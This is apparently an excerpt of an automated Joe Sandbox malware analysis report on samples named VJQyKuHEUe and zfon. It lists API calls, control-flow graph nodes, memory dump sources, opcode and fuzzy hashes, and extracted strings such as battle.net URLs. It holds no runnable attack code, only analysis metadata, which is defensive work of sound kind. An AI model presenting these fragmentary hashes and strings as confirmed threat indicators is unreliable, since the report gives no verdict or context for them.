                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 511 275ab94-275b400 514 275b402-275b405 511->514 515 275b408-275b433 GetModuleHandleW 511->515 514->515 516 275b435-275b43b 515->516 517 275b43c-275b450 515->517 516->517
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0275B1EC), ref: 0275B426
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 519 2759cd8-2759d24 521 2759d26-2759d4e KiUserCallbackDispatcher 519->521 522 2759d72-2759d8b 519->522 523 2759d57-2759d6b 521->523 524 2759d50-2759d56 521->524 523->522 524->523
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02759D3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 526 9370040-93700aa PostMessageW 527 93700b3-93700c7 526->527 528 93700ac-93700b2 526->528 528->527
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0937009D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2548359781.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9370000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:

                                                                                                Execution Graph

                                                                                                Execution Coverage:0.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0.5%
                                                                                                Total number of Nodes:204
                                                                                                Total number of Limit Nodes:5

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowfputwcfwritestd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 247381371-1866435925
                                                                                                • Opcode ID: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                • Instruction ID: b6f7de4768affe16859699a71e4fd12e962b28ff7ba6dc9d047b9c904a2326cd
                                                                                                • Opcode Fuzzy Hash: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                • Instruction Fuzzy Hash: 7F717B62618A86D9EF10CF69E4503A933A0FB84BC8F954032EB4D87B54EF3DE656D300

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$setlocale
                                                                                                • String ID:
                                                                                                • API String ID: 294139027-0
                                                                                                • Opcode ID: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                • Instruction ID: a099397a9bd2c3935e8c1e289f17ef55bdbefea8fa41976adbd0ee5892e783ab
                                                                                                • Opcode Fuzzy Hash: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                • Instruction Fuzzy Hash: 78112E27A1AB8181EF149FB9D4A43392360EF49FB9F141634CB2F55194CF2CD485D380

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                • Opcode ID: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                • Instruction ID: de5ee640f8aee4fe17ca603fe92df7ed834a828a05202b0f2ef9526065b462b6
                                                                                                • Opcode Fuzzy Hash: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                • Instruction Fuzzy Hash: D631AB62A0CA86D1EE109F2DE4601B977A0FB84BE0F584232DB6D037E6DE3CE5469340

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_allocmalloc$ConsoleCtrlHandleHandlerModuleSleepfree
                                                                                                • String ID:
                                                                                                • API String ID: 1258940858-0
                                                                                                • Opcode ID: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                • Instruction ID: eae1ab0b7a5b59ec524273681eca224b0f9a9e126a629c048a6728c1fe34e338
                                                                                                • Opcode Fuzzy Hash: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                • Instruction Fuzzy Hash: 84215E20E0C64291EB55BF26AC411B9D7B29F84784FC80035E97D073DBEE2DE44486F1

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExceptionFileLastThrowView
                                                                                                • String ID:
                                                                                                • API String ID: 2958022518-0
                                                                                                • Opcode ID: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                • Instruction ID: bce915de1cffd8436c3459c2998b5a2ab2615b63cf6a347664d9da29690841a2
                                                                                                • Opcode Fuzzy Hash: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                • Instruction Fuzzy Hash: 3501D861A14745C3EF18AF24E844339A3A0FF84754F500835DB5D4ABD9DF3DC45287A0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2803490479-0
                                                                                                • Opcode ID: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                • Instruction ID: 2587392541922adf30ef915fbb19522a8dc15e9e67f7ac82fb1ee587ba423cd2
                                                                                                • Opcode Fuzzy Hash: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                • Instruction Fuzzy Hash: E6F0892161C79181E7209A197800039D6B4AB89BE0F644734EBFD477DDDF3CD4514760

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _onexit
                                                                                                • String ID:
                                                                                                • API String ID: 572287377-0
                                                                                                • Opcode ID: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                • Instruction ID: 101527fc942efb76abcd1dc8eb97191bcd353566ee098423acd92d3c9d873e20
                                                                                                • Opcode Fuzzy Hash: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                • Instruction Fuzzy Hash: 34E0C252F69487D0E600BF3DEC91BF82150AF243C1FE05531C60D816A1DD0CD39AEB00

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 151 7ff8b90f8510-7ff8b90f851b 152 7ff8b90f8525-7ff8b90f8529 151->152 153 7ff8b90f851d-7ff8b90f851f setlocale 151->153 153->152
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale
                                                                                                • String ID:
                                                                                                • API String ID: 1598674530-0
                                                                                                • Opcode ID: 8448ee705ff148786f64ba50eaaef5e3f2e566f6558155d0efa0fa51944e528a
                                                                                                • Instruction ID: c2ee8524f5f5307c4e43159f298094b5c10931ac236cadd9385483acdc73511f
                                                                                                • Opcode Fuzzy Hash: 8448ee705ff148786f64ba50eaaef5e3f2e566f6558155d0efa0fa51944e528a
                                                                                                • Instruction Fuzzy Hash: BCC02B61F0D140C1ED4C2F1D58811390231AF08FC4F905834C70F00100CD1EC0934300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_allocfree$malloc
                                                                                                • String ID: /shop/$battle.net$https$www.battlenet.com.cn
                                                                                                • API String ID: 3106151382-2878237680
                                                                                                • Opcode ID: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                • Instruction ID: 3022834a09a3ffd16a279211b8201602eba1896dbcee6b391533a0decf307954
                                                                                                • Opcode Fuzzy Hash: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                • Instruction Fuzzy Hash: E0D18C32B08B418AEB11EF65D8103ADB3B6AB04B98F844535CE2D17BD9DF39D416C3A5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpymemmove$malloc
                                                                                                • String ID: ([:\/]|\?|\n|$)
                                                                                                • API String ID: 2735842428-1527476142
                                                                                                • Opcode ID: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                • Instruction ID: 3f537f2262b2f256d631bdfa910c813040c08dd02bd874bb1c48bad1a85c36d7
                                                                                                • Opcode Fuzzy Hash: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                • Instruction Fuzzy Hash: 98028F62F09B4185FB50EEA5DC103ADA771AB187E8F845232DE2E57ADDDF38D40583A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                • String ID:
                                                                                                • API String ID: 1462992686-0
                                                                                                • Opcode ID: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                • Instruction ID: 074d4ed2881e6f135aea2210d596e24f28d4fe7b593f0df0c2e734f97ff08f82
                                                                                                • Opcode Fuzzy Hash: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                • Instruction Fuzzy Hash: 7E817122609B8186E795EF11AC143AAB7B4EF89BC0F849434DA9D077E8DF3CD455C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freemallocmemcpy$memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2260118914-0
                                                                                                • Opcode ID: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                • Instruction ID: 048f2554103fc5fde6d1a738e63b336151641540e67e67f853ea6ad1197465d0
                                                                                                • Opcode Fuzzy Hash: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                • Instruction Fuzzy Hash: 62E17222B0964185FB10FFB2D8403FDA3B2AB48798F840636DE2E176CDDE39D40583A5
                                                                                                APIs
                                                                                                Strings
                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7F97A4F63
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                • API String ID: 389471666-631824599
